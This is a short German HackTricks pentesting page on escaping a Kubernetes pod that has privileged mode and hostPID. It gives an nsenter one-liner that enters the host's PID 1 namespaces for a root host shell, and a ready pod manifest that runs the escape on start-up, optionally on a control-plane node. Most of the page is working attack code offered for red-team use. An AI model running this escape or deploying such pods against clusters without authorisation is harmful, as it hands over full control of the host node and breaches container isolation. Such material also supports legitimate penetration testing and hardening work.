Pod Escape Privilegien

Reading time: 2 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Privilegiert und hostPID

Mit diesen Privilegien haben Sie Zugriff auf die Prozesse des Hosts und genug Privilegien, um in den Namespace eines der Hostprozesse einzutreten.
Beachten Sie, dass Sie möglicherweise nicht privilegiert sein müssen, sondern nur einige Fähigkeiten und andere potenzielle Abwehrmaßnahmen umgehen können (wie AppArmor und/oder Seccomp).

Wenn Sie etwas wie das Folgende ausführen, können Sie aus dem Pod entkommen:

bash
nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Konfigurationsbeispiel:

yaml
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command:
[
"nsenter",
"--target",
"1",
"--mount",
"--uts",
"--ipc",
"--net",
"--pid",
"--",
"bash",
]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks